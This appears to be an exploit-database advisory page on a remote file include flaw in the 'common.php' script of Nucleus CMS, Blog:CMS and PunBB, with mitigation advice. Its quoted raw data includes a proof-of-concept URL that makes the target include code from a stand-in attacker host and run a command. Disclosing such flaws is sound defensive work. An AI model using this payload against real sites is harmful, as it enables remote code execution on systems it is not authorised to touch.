header-logo
Suggest Exploit
vendor:
Nucleus CMS, Blog:CMS, and PunBB
by:
7.5
CVSS
HIGH
Remote File Include
CWE
Product Name: Nucleus CMS, Blog:CMS, and PunBB
Affected Version From:
Affected Version To:
Patch Exists: NO
Related CWE:
CPE:
Metasploit:
Other Scripts:
Platforms Tested:

Remote File Include Vulnerability in Nucleus CMS, Blog:CMS, and PunBB

Nucleus CMS, Blog:CMS, and PunBB are vulnerable to a remote file include vulnerability that may allow an attacker to include malicious files containing arbitrary code to be executed on a vulnerable computer. Input passed to the 'common.php' script is not sufficiently sanitized.

Mitigation:

Apply a patch or update to the latest version of the affected applications. Additionally, restrict access to the 'common.php' script to trusted sources only.
Source

Exploit-DB raw data:

source: https://www.securityfocus.com/bid/10760/info

Nucleus CMS, Blog:CMS, and PunBB are vulnerable to a remote file include vulnerability that may allow an attacker to include malicious files containing arbitrary code to be executed on a vulnerable computer.

Input passed to the 'common.php' script is not sufficiently sanitized.

All three applications are vulnerable because they have a similar or identical code base.

http://www.example.com/forum/include/common.php?pun_root=http://www.host_evil.com/cmd?&=id

Navigation

Suggest Exploit

Services By CQR